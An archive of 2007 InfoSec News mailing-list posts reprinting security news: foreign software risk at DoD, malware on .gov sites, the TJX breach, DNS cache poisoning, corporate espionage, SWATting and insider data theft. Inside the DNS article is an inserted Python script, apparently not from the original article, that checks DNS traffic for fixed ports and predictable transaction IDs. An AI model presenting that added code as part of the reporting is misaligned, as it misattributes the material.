From alerts at infosecnews.org Mon Dec 3 00:24:47 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Defense board sounds louder alarm about foreign software development
Message-ID:

http://www.govexec.com/story_page.cfm?articleid=38713

By Bob Brewin
Govexec.com
November 30, 2007

Software developed in foreign countries and used by the Defense Department and other agencies puts federal information systems at serious risk of being hacked and compromised, according to a recent report issued by Defense's top advisory board.

The report [1], released last month by a Defense Science Board task force, warns that "globalization of software development where some ... U.S. adversaries are writing the code that ... [Defense] will depend upon in war creates a rich opportunity to damage or destroy elements of the warfighter's capability."

Defense relies heavily on commercial off-the-shelf and custom-built software developed in countries such as India, China and Russia, so it can quickly and cheaply take advantage of the latest advances designed for global markets rather than relying solely on U.S. developers.

But the task force's report, "Mission Impact of Foreign Influence on DoD Software," concluded that relying on software developed in other countries "presents an opportunity for threat agents to attack the confidentiality, integrity and availability of operating systems, middleware and applications that are essential to operations of U.S. government information systems and the DoD."

The report emphasized that "the most direct threat is foreign corruption of software: insertion by the developer of malware, backdoors and other intentional flaws that can later be exploited."
The fear that software developed in foreign countries that government agencies use in information systems may contain backdoors or programs that allow hackers to steal information or take down systems goes back to the late 1990s, when federal agencies hired foreign contractors to rewrite code to keep systems from malfunctioning when the date changed to the year 2000. But the Defense Science Board report is the first formal acknowledgement since 1999 at the top levels within Defense that such a security risk exists and highlights the seriousness of that risk.

A 1999 Defense Science Board task force report titled "Globalization and Security" [2] stated, "DoD's necessary, inevitable and ever increasing reliance on commercial software -- often developed offshore by software engineers who have little, if any allegiance to the United States -- is likely amplifying DoD vulnerability to information operations against all such systems incorporating such software."

The 2007 task force report echoes the 1999 warnings about the potential of malicious code in commercial software threatening Defense systems. The 1999 report concluded, "Malicious code, which would facilitate system intrusion, would be all but impossible to detect through testing, primarily because of software's extreme and ever increasing complexity. ... Increased functionality means increased vulnerability."

But the latest warnings come with hard evidence that Defense systems already have been infiltrated. In his introductory letter for the 2007 report, Robert Lucky, the task force chairman and a former vice president of Telcordia Technologies (formerly Bell Labs), wrote: "Low level malicious technologies have been employed to successfully penetrate sensitive, unclassified DoD systems despite efforts by DoD to maintain information security and assurance."

The board also reported that Defense faces a security threat from "foreign adversaries' corruption of the supply chain.
Commercial development processes make no guarantees about the purity (or lack of corruption) of the supply chain, nor could they reasonably do so. The overall opaqueness of the software development supply chain and the complexity of software itself make corruption hard to detect."

Defense faces "a difficult quandary in its software purchases in applying intelligent risk management, trading off the attractive economics of COTS and of custom code written offshore against the risks of encountering malware that could seriously jeopardize future defense missions," the board concluded in the report. Current systems designs, assurance methodologies, acquisition procedures and knowledge of adversarial intentions "are inadequate to the threat."

Despite these concerns, the board task force recommended that Defense continue to "procure from, encourage and leverage the largest possible global competitive marketplace consistent with national security." Marketplace realities dictate the globalization of information technology, which provides Defense with cost savings and market innovation, and the board pointed out that the greatest threat to Defense systems comes from custom code written for specific projects or programs, not COTS software packages from companies such as Microsoft.

The board's conclusion dovetails with a Center for Strategic and International Studies report [3] released in March. In its foreword, Philip Bond, president and chief executive officer of the Information Technology Association of America, wrote, "The information technology industry is global. Corporations based at home and abroad depend on a worldwide supply chain to deliver and develop the very best products to the U.S. government." Restricting Defense to software written in the United States would provide an advantage to "our adversaries jockeying for a position on the battlefields of cyberspace," Bond noted.
The board's task force said Defense and the intelligence community need to develop policies and procedures to ensure the integrity of software used in critical information systems, but warned that "the problem of detecting vulnerabilities is deeply complex, and there is no silver bullet on the horizon."

Ensuring the integrity of code in complex Defense systems, such as the Army's Future Combat Systems, which will use millions of lines of code to stitch together multiple battlefield systems, presents a particular challenge, according to an appendix to the board report. About 27 million lines of source code used in FCS are either COTS code or open source.

The FCS program office has determined there is a "low-to-moderate risk that malicious code could be inserted into the FCS Master Software Baseline and exploited," but, the report added, the Army has decided to handle the problem of potentially malicious code by assuming that the "profit motive will assure clean code in 'shrink wrapped' [consumer] software."

The Army also has decided to accept foreign software for areas not critical to the performance of the FCS System of Systems Common Operating Environment, according to the report, and plans to make blind buys of software so the vendor does not know it has been purchased for use in FCS. The report said the Army has no automated tools that can detect all malicious code and line-by-line inspection in FCS is not feasible.

Philip Coyle, senior adviser with the Center for Defense Information, a security policy research organization in Washington, said the only reason the Army is not conducting line-by-line inspection of code is because Boeing Co., the FCS lead systems integrator, "doesn't want to do it, and the Army doesn't want to have to pay them to do it."

"For the Army to say it is not feasible is nonsense," said Coyle, who served as assistant secretary of Defense and director of its operational test and evaluation office from 1994 to 2001. "Of course it's feasible.
Tedious? Yes, but they're going to have to do it eventually when problems develop in FCS software that was assembled from a wide variety of sources that turn out not to work effectively together in the overall system-of-systems."

Coyle added, "Boeing will need to examine supplier source codes from the start. Waiting until U.S. soldiers on the battlefield can prove that a supplier has failed will be too late."

Boeing officials declined to answer a query about inspecting FCS software code, deferring to the Army due to the "sensitivity" of the issue.

Paul Mehney, an Army FCS spokesman, said the program has "a robust information assurance plan in place. Potential threats are well known and well understood, and processes, plus leading-edge technology, will be used to address the threats. Additionally, as consistent with Army regulations and acquisition policy, foreign ownership, control or influence will be taken into account prior to software development, integration or purchase."

Ed Hammersla, chief operating officer of Trusted Computer Solutions in Herndon, Va., which supplies software used across Defense and the intelligence community, said automated tools can help the Army examine its FCS software. In addition, he said, TCS writes all its code in the U.S. and makes a profit.

The Defense Science Board recommended that Defense could better ensure the integrity of custom software by requiring all custom code written for its systems deemed mission critical be developed by U.S. citizens holding security clearances. ITAA's Bond said he partially agreed with that suggestion, but added, "We're very interested in where they draw the line on what is critical."

The board report said the ability to examine COTS software source code would be a big help in detection of malware, but pointed out that such an approach would be expensive and could pose a risk to a vendor's intellectual property.
Scott Charney, Microsoft corporate vice president at Trustworthy Computing in Redmond, Wash., said his company gives all governments worldwide, including the U.S. government, access to its source code.

The board's task force also recommended that Defense gain insight into the processes vendors use to develop COTS software so it has meaningful assurance that software code isn't being tampered with. The board called for a product evaluation regime that is capable of reviewing vendor development processes and rendering a judgment about the ability of the vendor to produce secure software. The report also said the department must assess the tools vendors use to identify vulnerabilities and allow Defense personnel to interview developers.

Charney said Microsoft has advocated since 2004 a focus on a vendor's actual development process and use of Security Development Lifecycle policies and tools to reduce software vulnerability rates. Charney said Microsoft's SDL enforces a number of technical and policy controls to limit and monitor access to its source code. Additional processes included in the SDL, such as automated and manual reviews and testing, "provide other mechanisms that would make an attempt to tamper with our source code even more difficult," he said. "The SDL embeds security and privacy milestones at every stage of the development process."

As part of the SDL, Charney said Microsoft conducts code reviews before the company ships software, uses independent test teams and automated tools to test security, and conducts penetration testing by independent third parties, in some cases.

Charney said developing software under these processes underscores the fact that software security has less to do with where it is written than how it is written. "Both secure and less secure software can be written anywhere," he said. "Because the goal is to produce more secure software, it is critically important that vendors leverage the best talent available and that talent may be located both inside and outside the United States."

Andy Kendzie, a spokesman for SAP in Newtown Square, Pa., said the board's report pointed out that software assurance should be judged according to the vendor's actual development process and not merely its location. He added that while SAP's general software packages are developed in a global environment, "software for highly sensitive customers is handled in U.S.-based secure environments."

ITAA's Bond agreed that Defense needs more insight into software vendors' development processes, but not to the extent that impedes the ability of software vendors to innovate. Chris Fountain, chief executive officer of SecureInfo, a McLean, Va., provider of information assurance software to Defense and other federal users, said Defense should be able to "look over the shoulder" of software developers.

Bond said any risks inherent in offshore development need to be balanced against global software innovations, which have "tremendously improved" U.S. warfighting capabilities.

[1] http://www.acq.osd.mil/dsb/reports/2007-09-Mission_Impact_of_Foreign_Influence_on_DoD_Software.pdf
[2] http://www.acq.osd.mil/dsb/reports/globalization.pdf
[3] http://www.csis.org/media/csis/pubs/070323_lewisforeinginflubook.pdf

From alerts at infosecnews.org Mon Dec 3 00:25:13 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] California gov site invaded by smut and malware again
Message-ID:

http://www.theregister.co.uk/2007/12/01/government_sites_serve_malware/

By Dan Goodin in San Francisco
1st December 2007

Raising troubling questions about the security of America's government websites, more domains ending in .gov have been found hosting links that push porn and malware.
They include the Marin County Transportation Authority, which has watched its site get hacked at least twice before. In early October the domain forced the shutdown of all California government websites until admins could remove the links. A week after the sites were disinfected, the rogue pointers returned.

On Friday, more than 24 hours after this post [1] from Sunbelt Software first reported the reemergence of the links, the gov site was riddled with at least a dozen pages that, when clicked, redirected users to smut sites. Users then got a message saying they had to install a special codec in order to view the content. The codecs contain Trojans that install malware. By Friday evening in California, the tainted pages were finally removed, and the executive director of the agency apologized for the problem.

The other site actively pushing smut and malware at the time of writing was USAid, a federally operated agency that extends aid to countries recovering from disasters. Perhaps they should attend to their own affairs first.

Over the past several months, the poisoning of search caches belonging to Google and other search engines has emerged as a chief tactic by miscreants in inflating rankings of their malicious websites. At the moment, Google security pros are scrambling to eradicate a flood of malicious links. Problem is, the purveyors of smut and malware are quickly able to taint the cache with a new batch of domains. The whack-a-mole battle finally prompted Google to issue this request for help from its users.

The infections of the gov sites, which are easily documented by these two Google searches (safe to click if you don't mind "porn" in your url, but you probably shouldn't click on any of the search results), appear to be yet another attempt to boost the rankings of the malicious sites.
Dianne Steinhauser, executive director of the Marin County Transportation Authority, said she thought the problem was fixed in mid September, after her agency dumped its old web host, StartLogic, and contracted with a new one.

"Even though we quit any web hosting with them, they had a publicly accessible web page with our name on it," she told The Register. "They still had a web service under our name, and that was a complete surprise."

Hackers were able to create the porn- and malware-infested pages by infiltrating StartLogic's system, she said. The pages became inaccessible after her office directed the web host to remove the web-accessible service, she said.

"I am exceptionally apologetic for anyone that was contaminated by virtue of our name," she said.

Attempts to reach representatives of StartLogic and USAid were not successful.

[1] http://sunbeltblog.blogspot.com/2007/11/porn-back-on-cagov-sites-oh-this-is-not.html

From alerts at infosecnews.org Mon Dec 3 00:25:37 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] TJX agrees to reimburse banks
Message-ID:

http://www.boston.com/business/globe/articles/2007/12/01/tjx_agrees_to_reimburse_banks/

By Ross Kerber
Globe Staff
The Boston Globe
December 1, 2007

Framingham retailer TJX Cos. agreed to reimburse banks up to $40.9 million as a result of the largest data breach in history, which compromised as many as 100 million credit and debit card accounts before it was discovered at the end of last year.

TJX, the parent of discount chains including TJ Maxx and Marshalls, reached a deal with credit card network Visa Inc. to pay some of the costs of reissuing cards and covering fraud losses at banks that issue Visa products, the two companies said yesterday. TJX also said it would help promote new security standards that Visa, MasterCard Inc., and banks have struggled to persuade merchants to accept.
In return, the banks would agree not to sue TJX or its partners, and Visa would suspend some fines it levied after the breach, the companies said.

The unprecedented terms demonstrate that retailers, banks, and card companies realize they must stop blaming one another for security lapses in an industry that handled $3.5 trillion worth of transactions last year, said Mary Monahan, partner at Javelin Strategy & Research in California.

"We have a merchant and a card company saying, let's end the finger-pointing here," Monahan said. "Basically, they're recognizing consumers are tired of these data breaches and want to be protected," Monahan said.

In a recent survey of 1,200 debit and credit card users, Javelin found 40 percent of the people surveyed had at least one card compromised in the past year, a level that could potentially erode confidence in the payment networks.

In a statement, Ellen Richey, Visa's head of global risk management, said, "This agreement demonstrates the importance of retailers and the payment card industry working together to protect cardholder data. . . . We hope one outcome of this resolution is recognition that a greater investment in security is good business."

TJX president and chief executive Carol Meyrowitz said in a statement her company has improved its own security since the breach. "We have also learned about the heightened security risks that exist across the entire US retail and banking industries as a result of today's high tech criminals. We believe that cooperative action is required by all banks, payment card companies and merchants to better protect customer payment card data, and we look forward to working together with Visa to further this goal."

Visa is the largest of the payment card networks, with more than 1.6 billion cards in circulation. Yesterday's terms were unique, Monahan said, since negotiations following a data breach rarely include a direct deal between a merchant and a card network.
Monahan said she expects MasterCard may make a similar deal with TJX and banks. A MasterCard spokesman said it wouldn't comment.

Banks that are part of the Visa network and make up at least 80 percent of the accounts affected by the TJX breach must accept the agreement before it becomes valid, and it would not cover some foreign losses.

TJX's breach had become a flashpoint for the payments industry amid a growing threat from hackers. Beginning in January, the company and outside investigators disclosed how intruders were able to penetrate the store's data network, apparently by intercepting wireless transmissions at stores in Florida, and download account numbers that have been used to conduct fraudulent purchases worldwide. So far the only convictions involve a group of low-level criminals in Florida that used some of the numbers to make purchases at local chain stores.

TJX has said at least 45.7 million payment card numbers were compromised. Visa and MasterCard won't comment, but the total impact of up to 100 million compromised accounts is spelled out in court filings recently unsealed.

TJX still faces lawsuits from New England banks seeking to recover the costs of issuing cards following the breach. Filings in that litigation showed Visa had issued $880,000 in penalties against the bank that processed payments at TJX stores, Fifth Third Bancorp of Ohio, citing the stores' security failures. Other filings in that case described numerous computer-security problems at TJX, including a lack of firewalls to protect data and a reliance on an outdated wireless-security protocol that is more vulnerable to hackers.

As part of yesterday's deal, Visa said it would waive certain fines against Fifth Third and move the money into the broader recovery fund. The fund is meant to cover the costs banks faced for fraud losses and expenses like reissuing cards, though a Visa spokeswoman declined to give details on the total costs to banks.
Visa said banks could expect more reimbursement if they agreed to the deal than they could expect under existing antifraud programs. Fifth Third also is part of the settlement.

Another part of the deal would have TJX help promote tougher security standards that Visa and other card networks wanted large merchants to meet by Sept. 30 of this year. Only 65 percent did so, according to Visa's most recent figures.

TJX had previously said it faced costs of $256 million as a result of the breach, and it has set money aside for those costs. Yesterday, it said its estimates included the potential $40.9 million payment to banks.

Copyright 2007 Globe Newspaper Company.

From alerts at infosecnews.org Mon Dec 3 00:29:33 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] DNS hacked again with poisoning attack
Message-ID:

http://computerworld.co.nz/news.nsf/scrt/C5117F8EF8F89577CC2573A200809036

By Roger A Grimes
San Francisco
3 December, 2007

Amit Klein, of Israeli security company Trusteer, recently released details on DNS server cache poisoning attacks that affect both BIND (Berkeley Internet Name Domain) and Windows DNS servers. It goes to show that every time you think a problem with a well-known protocol or service has been solved, it may not be.

DNS has been with us since 1983, nearly as long as the internet. And although DNS RFCs have come and gone, DNS is still very similar to its original specifications. Certainly it has grown in feature set and complication, but it still has the same underlying security problems it did when it was invented by Paul Mockapetris. The biggest problem is the lack of default authentication. Several security mechanisms have been created for DNS with varying degrees of success (and failure) to solve the authentication problem, but it is still relatively easy to fake a DNS packet to either a DNS server or an unwitting client.
Klein's last find involved two discoveries, both of which allow important parts of a DNS server packet to be forged with trivial effort. The first implementation error involves the DNS UDP source port. Although it should be randomised to prevent forging, it turns out that the source port never changes the whole time the DNS server is up and running. The second, and more important, problem is the trivial predictability of the transaction ID value. Both errors allow DNS server packet information to be predicted and forged.

An attacker can send a malicious web page link and induce an end-user to click on the link. The clicked link sends off a DNS client query, which can be forged, sending the end-user to a bogus location.

DNS has been found vulnerable in the same way before. In fact, Klein laments, "It is saddening to realise that 10-15 years after the dangers of predictable DNS transaction ID were discovered" that DNS software is still susceptible to transaction ID exploitation.

Klein reported his findings to BIND's caretakers, the Internet Software Consortium (ISC), in late May and to Microsoft in April. Both the ISC and Microsoft have released patches or updated software. Thanks are due to Amit Klein for his research and responsible disclosure.

Overall, Microsoft's DNS implementation has been relatively secure. The last major security update to Windows DNS was in Windows 2000 SP2 and SP4, as well as Windows Server 2003 (nearly five years ago). BIND is the most popular version of DNS server software used on the internet, and its overall security track record has been a bit more active over the years, as one would expect with more popular software. BIND versions 8.x and 9.x have had at least six different vulnerabilities published.

The most secure version of DNS is considered djbdns, named after its author, Dr Dan J Bernstein, one of the most prominent voices for security over functionality in computer software.
Although djbdns (also known as tinydns for one of its daemons) is not nearly as functional as Windows DNS or BIND, it is run by some of the world's largest companies. Dr Bernstein claims that more than 1.8 million .com addresses use djbdns. And though Dr Bernstein has been offering a US$500 (NZ$657) reward to anyone who can find an error in its 7,000 instructions, there has yet to be a successful claim. Unfortunately, djbdns is built only for Unix and could not be used efficiently to support an Active Directory domain.

Besides making sure your DNS servers are running up-to-date versions of DNS, I think Klein's findings bring up another interesting point. Open source advocates are always touting how open source software allows programming and security bugs to be found faster than with closed source software. It certainly makes sense: there's source code to review, and more eyeballs to review it. But as Klein's research shows, it doesn't make that much of a difference. In the 10 to 15 years that have gone by, nobody (publicly) found the bugs in either the closed source or open source versions. Both errors went undetected for more than a decade until one person got interested in the research.

There are dozens of cases just like this, where open source bugs remained undiscovered for a decade or more, until one lone individual on their own personal quest did some digging. You can look at any of the popular protocols (such as SMTP, SNMP, HTTP, FTP, ASN.1, and so on) and find vulnerabilities that went undiscovered for over a decade. Heck, people are still finding problems in IPv4 packets that have been around for 20-odd years. And as far as I can tell, whether or not the product was open source didn't really play a part in the finding or the fix, albeit the open source fixes are consistently coded faster when the problem is located. What mattered most was a single person (or company) that cared enough to investigate.
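The two implementation errors the article attributes to Klein's research, a UDP source port that never changes and a transaction ID that is trivially predictable, are both things a defender can measure from the resolver's own outbound traffic. The script below is an added example written for this digest; it is not part of the article, of Klein's published research, or of any DNS server's code. It parses the 12-byte DNS header from captured query payloads, then checks a window of queries for a fixed source port and for a transaction ID that advances by a constant step. The two traffic samples are constructed in the script (one imitating the weak behaviour described above, one with per-query random port and ID), and the function names (`assess_resolver`, `make_query`, and so on) are this example's own.

```python
"""Check a resolver's outbound queries for the two weaknesses the article
describes: a source port that never changes and a predictable transaction ID.
Added example; all traffic below is constructed, not captured."""
import math
import random
import struct
from collections import Counter


def make_query(txid: int, qname: str) -> bytes:
    """Build a minimal DNS A query in RFC 1035 wire format (used for sample traffic)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    labels = b"".join(bytes([len(l)]) + l.encode() for l in qname.split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_dns_header(payload: bytes) -> dict:
    """Decode the fixed DNS header; only the ID and the QR bit matter here."""
    if len(payload) < 12:
        raise ValueError("payload shorter than the 12-byte DNS header")
    txid, flags = struct.unpack("!HH", payload[:4])
    return {"txid": txid, "is_response": bool(flags & 0x8000)}


def shannon_entropy_bits(values) -> float:
    """Entropy of the observed values; 16 distinct values give at most 4.0 bits."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())


def txid_is_sequential(txids) -> bool:
    """A counter shows up as one constant small step between consecutive IDs
    (mod 2^16). Entropy alone misses this, because a counter never repeats."""
    if len(txids) < 3:
        return False
    deltas = {(b - a) % 65536 for a, b in zip(txids, txids[1:])}
    return len(deltas) == 1 and 1 <= next(iter(deltas)) <= 16


def assess_resolver(observations) -> dict:
    """observations: (src_port, dns_payload) pairs seen leaving one resolver.
    Responses are ignored; only the resolver's own queries are assessed."""
    queries = [(port, parse_dns_header(p)) for port, p in observations]
    queries = [(port, h) for port, h in queries if not h["is_response"]]
    ports = [port for port, _ in queries]
    txids = [h["txid"] for _, h in queries]
    findings = []
    if len(queries) >= 8 and len(set(ports)) == 1:
        findings.append("fixed source port")
    if txid_is_sequential(txids):
        findings.append("sequential transaction IDs")
    return {
        "queries": len(queries),
        "distinct_ports": len(set(ports)),
        "port_entropy_bits": round(shannon_entropy_bits(ports), 2) if ports else 0.0,
        "txid_entropy_bits": round(shannon_entropy_bits(txids), 2) if txids else 0.0,
        "findings": findings,
    }


def weak_resolver_sample() -> list:
    """Constructed: one static port and a transaction-ID counter, as the article describes."""
    return [(53, make_query(0x1000 + i, f"host{i}.example.test")) for i in range(16)]


def hardened_resolver_sample() -> list:
    """Constructed: a fresh random ephemeral port and random ID per query (seeded for repeatability)."""
    rng = random.Random(7)
    return [(rng.randrange(1024, 65536), make_query(rng.randrange(65536), f"host{i}.example.test"))
            for i in range(16)]


if __name__ == "__main__":
    for name, sample in (("weak", weak_resolver_sample()), ("hardened", hardened_resolver_sample())):
        print(name, assess_resolver(sample))
```

To use it on real traffic, feed `assess_resolver` the (source port, UDP payload) pairs of queries your resolver sends to the internet, taken from a packet capture on the resolver itself. Note that the weak sample scores a full 4.0 bits of transaction-ID entropy over the window despite being a plain counter, which is why the step test, not the entropy figure, is what flags it.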
From alerts at infosecnews.org Mon Dec 3 00:30:00 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Secrets of Shell and Rolls-Royce come under attack from China's spies
Message-ID:

http://business.timesonline.co.uk/tol/business/markets/china/article2988228.ece

By James Rossiter
The Times
December 3, 2007

Rolls-Royce and Royal Dutch Shell have fallen victim to Chinese espionage attacks, The Times has learnt.

Sustained spying assaults on Britain's largest engineering company and on the world's second-biggest oil multinational occurred earlier this year as part of a campaign to obtain confidential commercial information, sources said.

News of the attacks on Rolls-Royce and Shell comes after a warning by Britain's security services that China is sponsoring espionage against vital parts of the British economy, including breaking into big companies' computer systems.

It is understood that Chinese-backed computer hackers broke into the internal computer network of Rolls-Royce in an attack that a security source said "nearly took them out". Rolls-Royce engines are widely used by many of the world's largest airlines and are deployed in transport vehicles of many Armed Forces in Nato, including those of Britain and the United States.

Shell, an Anglo-Dutch group, had to deal with a spying ring in Houston, Texas, security sources told The Times. Chinese nationals working for the company were preyed upon by state-backed operatives hoping to obtain confidential pricing information for its operations in Africa, the sources said.

African countries have been targeted by international oil companies in the commercial battle to tap into vast new oil reserves needed to support both the developed economies of the West and the rapidly expanding economy of China, which has vast coal reserves but little oil and gas.
The infiltration of the Rolls-Royce computer server was described as a virtual attack, a source said: "The Chinese - the People's Liberation Army - have been up to it for a good while, but it has really come to the fore recently. They tried to get inside Rolls-Royce - their IT systems."

Jonathan Evans, Director-General of MI5, has sent a letter to 300 chief executives and security chiefs in banks and accounting and legal firms telling them that they are under attack from Chinese state organisations, The Times revealed this weekend.

A summary of the MI5 warning, posted on the website of the Centre for the Protection of the National Infrastructure, says: "The contents of the letter highlight the following: the Director-General's concerns about the possible damage to UK business resulting from electronic attack sponsored by Chinese state organisations, and the fact that the attacks are designed to defeat best-practice IT security systems."

It is understood that Rolls, in common with most other networks, has several layers of firewalls, with the most confidential information, thought to contain engine designs and repair codes, at the centre. The infiltration of the Rolls network is thought to have occurred remotely after a specially tailored Trojan, a software code wrapped up in a virus, was downloaded into the site, allowing information to be relayed back out of the company's IT server. It is thought that the infiltration occurred in the UK. Rolls's IT network extends, however, to its international operations, including Scandinavia and the United States.

The source said: "They did not get enough inside, but it was a sufficiently big attack to get very worried. They got to the so-called not very important information before being rooted out."

Shell is understood to have uncovered a special interest group in Houston consisting of its Chinese nationals, who were encouraged to meet socially after work. The networking group was, however, a front for recruiting Chinese nationals.
In what security experts described as a typical form of social engineering, there was targeting of Chinese workers whose families were still in China. They were told to help "for the good of the Motherland", the source said, adding: "It was a form of threat. This particular European oil company was made aware and uncovered the spying operation, where the Chinese were put under moral pressure to give information."

Rolls-Royce and Shell declined to comment.

Garrod Haggerty, forensic technology partner in PricewaterhouseCoopers, the accounting firm, said that any company's IT network infrastructure should be robust, protected by firewalls and multi-layers of security to make it difficult to launch an all-out attack on a network.

From alerts at infosecnews.org Tue Dec 4 02:18:48 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Blind Hacker Says He's No Friend of Convicted SWATters
Message-ID:

http://blog.wired.com/27bstroke6/2007/12/blind-hacker-sa.html

By Kevin Poulsen
Wired.com
December 03, 2007

The FBI is circling around a blind 17-year-old phone hacker in Boston suspected of being the brains behind a gang of phone phreaks who sent police SWAT teams bursting into the homes of party line foes. But the teen, known on the lines as "Li'l Hacker," says he actually helped the FBI bust the gang's ringleader, 40-year-old Stuart Rosoff, who he describes as an enemy.

"I'm actually against those people," the teenager told THREAT LEVEL in a phone interview. "Mr. Rosoff and I are at odds ... He actually came after me and disconnected my phone service, but of course I had it turned back on instantly."

Because he is a minor, and hasn't been charged with a crime, THREAT LEVEL is not reporting Li'l Hacker's real name. He's identified in court documents by the initials M.W.

Blind from birth, Li'l Hacker admits to a deep and abiding interest in telecommunications from the age of eight.
He can identify touch-tones by sound, commit vast amounts of information to memory in an instant, and he once ordered manuals for DMS and #5 ESS switching gear then paid a transcription service to convert them to Braille.

But, contrary to the FBI's allegations in court documents, the teenager never helped Rosoff and other SWATters use a Caller ID spoofing service to phone in fake hostage reports to police, he claims, or use social engineering skills to obtain information on the gang's targets.

"If I get charged, to be honest with you dude, I'm not going to hold anybody responsible for anything that I've done," he says. "I don't do SWATs, that's the thing."

Stuart Rosoff of Cleveland, Ohio (left, in a 2004 mugshot) pleaded guilty to one count of conspiracy last month in federal court in the Northern District of Texas. In his plea deal, he stipulated that he worked with Li'l Hacker to obtain "telephone numbers, pass phrases, employee identification numbers, and employee account information used by the conspirators by various means including through 'social engineering' or pretexting of telephone calls to telecommunications company employees, 'war dialing', trafficking in pass phrases and access information with other phone 'phreakers,' etc."

Li'l Hacker, though, says he told the FBI all about Rosoff, and confessed co-conspirator Guadalupe Santana Martinez, when two agents interviewed him last year. "Not snitching, merely revenge," he says. The pair had targeted his mother, he says, phoning her up and threatening to call the Secret Service on the family. "She didn't know what was going on because she didn't know what I was involved in."

In court documents, the FBI accuses Li'l Hacker of, in effect, hacking with his voice. He allegedly made more than 50 pretext phone calls to the Verizon Provisioning Center in Irving, Texas, "and obtained unauthorized access to the computers located there, and used the access to obtain telecommunications services including Caller I.D.
blocking and call forwarding." He says he didn't do it. "I wouldn't do it directly if I was going to ... If I were to do that, hypothetically speaking."

The FBI also says the teen has the ability to listen in on phone calls -- he declined to comment on that.

He also allegedly gained access to the network operations center of Frontier Telecommunications in Rochester, New York, in October and November 2006. Li'l Hacker says he really just called a mysterious phone number somebody gave him in a chat room. "I made a mistake and dialed into a number, and apparently it was the NOC," he says. "I didn't log into anything ... I heard a tone, and said, 'What the hell is this?' And I just hung up."

He says the dialup wasn't even a computer modem. He knows, because he can identify different types of modems by ear. "I know the songs."

Li'l Hacker has some light perception, and he attends a local high school with sighted students, using a PAC Mate portable Braille display. He has not been charged with a crime, but he turns 18 years old in April, and some of his friends are worried.

Counting Rosoff, three people have pleaded guilty in the SWATting case: Martinez last April, and co-defendant Angela Roberson in October. All three have named Li'l Hacker as a co-conspirator. Two other defendants, Jason Trowbridge and Chad Ward, are set for trial in Texas this month.

From alerts at infosecnews.org Tue Dec 4 02:19:04 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Inside Microsoft's security war room
Message-ID:

http://www.news.com/8301-13860_3-9827124-56.html

Posted by Ina Fried
December 3, 2007

REDMOND, Wash. -- Tired of having to fight for a free conference room, Microsoft's security chief, Mike Nash, decided in early 2005 that the company needed a dedicated "war room" where his team could handle emergency responses. And while he was at it, why not have two?
That way, the folks working on fixing a security crisis could have a little breathing room from those drafting the public and customer communications around the issue. "They were tired of the communications people hearing of things that were half-baked," Nash said.

The Microsoft Security Response Center (MSRC) was completed in June 2005. The engineering conference room includes four flat-panel screens that can display live TV or a computer screen as well as a couple dozen chairs, though the place is often standing-room-only in a real crisis.

The war room is just one of a number of changes Microsoft has made over the years, usually the result of a lesson learned the hard way through some worm or other outbreak. In part one of a three-part series starting Monday, I take a look back at those painful lessons and how they have shaped Microsoft's current practices. On Tuesday, I'll look at the role of the human element in trying to keep software secure. And on Wednesday, I'll look at some of the people Microsoft counts on to keep its products safe. Each day there will be a blog too, going into more depth on one issue raised by that day's story.

While most of the room's accoutrements are practical - food, a world map, and clocks showing the time around the world - there is also a photo of actor Harvey Keitel. That's courtesy of Christopher Budd, who used to work as part of the security response effort.

"Back in 2001, I joked about how working to protect customers in the MSRC was a lot like being Harvey Keitel's character, 'The Wolf,' in Pulp Fiction," said Budd, who now works on Microsoft's privacy team. "Just like his character, I said, you're doing a hard job, and doing it right means you have to remain calm in a crisis and help others stay calm. When you do that, you help everyone stay focused on solving the problem."

To me, "The Wolf" seems like an odd choice for a company that is looking to be more transparent.
Wasn't his role in the movie to help clean up after a murder so that the rest of the world would not know what had transpired?

From alerts at infosecnews.org Tue Dec 4 02:19:19 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] IT pro admits to stealing 8.4M consumer records
Message-ID:

http://www.channelregister.co.uk/2007/12/04/admin_steals_consumer_records/

By Dan Goodin in San Francisco
4 Dec 2007

A senior database administrator for a consumer reporting agency in Florida has admitted stealing more than 8.4 million account records and selling them to a data broker. He netted $580,000 over five years from the scheme.

William Gary Sullivan, a DBA for Fidelity National Information Services, faces up to 10 years in federal prison and $500,000 in fines, although prosecutors agreed to recommend a more lenient sentence in exchange for his guilty pleas. He's also required to surrender all remaining proceeds and pay restitution to his victims.

Working for a subsidiary called Certegy Check Services, Sullivan used his access to Fidelity's database to pilfer records that included individuals' names, addresses and financial account information, according to court documents. To cover his tracks, he incorporated a business called S&S Computer Services, which sold the data to an unindicted co-conspirator. The unidentified cohort, according to authorities, then resold the consumer information to direct marketers, including one called Strategia Marketing, which also went by the name Suntasia.

The scheme first came to light in July, when Fidelity disclosed that an employee absconded with 2.3 million records [1]. Fidelity was alerted to the theft by a retail customer, which noticed a "correlation between a small number of check transactions and the receipt by the retailer's customers of direct telephone solicitations and mailed marketing materials". Fidelity later raised the estimate to 8.5 million records.
The company has said it is unaware of any identity theft or fraudulent financial activity resulting from the theft. Rather, it believes the stolen records were used for marketing purposes.

[1] http://www.theregister.co.uk/2007/07/04/fidelity_employee_steals_records/

From alerts at infosecnews.org Tue Dec 4 02:19:35 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Teen hacker has mild autism
Message-ID:

http://www.nzherald.co.nz/section/story.cfm?c_id=5&objectid=10479730

By Juliet Rowan
December 03, 2007

The teenager at the centre of an international cyber crime investigation has Asperger's syndrome, a mild form of autism often characterised by social isolation but great intelligence and talent in a particular area.

